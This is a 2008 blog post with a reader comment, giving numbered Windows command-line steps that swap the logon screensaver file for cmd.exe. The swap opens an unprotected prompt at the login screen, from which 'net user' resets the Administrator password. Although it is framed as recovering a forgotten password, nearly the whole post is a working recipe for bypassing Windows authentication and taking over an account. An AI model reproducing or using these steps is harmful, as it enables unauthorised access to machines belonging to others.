Hack Your Windows XP Administrator Password
Advertised by :Its nice to bookmark this tips if you forgot your Windows XP administrator password unintentionally
Here i show you :
1. Go to Start –> Run –> Type in CMD. It will open command prompt window.
2. Enter command: cd\ windows\system32 on that command prompt windows, then press enter. It will go to windows\system32 directory
3. Enter command: mkdir newpassword, then press enter. These command will make new directory called newpassword.
4. Enter command: copy logon.scr newpassword\logon.scr, then press enter. These command will copy logon.scr into newpassword directory.
5. Enter command: copy cmd.exe newpassword\cmd.exe, then press enter. These command will copy cmd.exe into newpassword directory.
6. Enter command: del logon.scr, then press enter. It will delete the existing logon.src file
7. Enter command: rename cmd.exe logon.scr, then press enter. It will rename cmd.exe to logon.scr
So, the tricks is you are backup the command program and the screen saver file first, after that edit the settings so when windows loads the screen saver we will get an unprotected dos prompt without logging in.
After that happed ( that unprotected dos prompt ) appears enter this command :
net user password
Example: If your admin user is Administrator and then you want change the password to ‘mypassword’ Then type in the following command:
net user Administrator mypassword
This will change the administrator password to mypassword.
Thats it you have successfully hacked the Window XP Administrator Password.
Best regards to Mr. Kumar for this tips.
This entry was posted on Tuesday, April 29th, 2008 at 3:17 am and is filed under How To. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.



ReviewABC June 8th, 2008 at 2:35 am
Hi Stephens,
If that the case, either there is no cmd.exe file exists in your windows/system32 or there is existing login.scr in that folder. Can you double check on it. Maybe thats is the culprit.
ReviewABC.com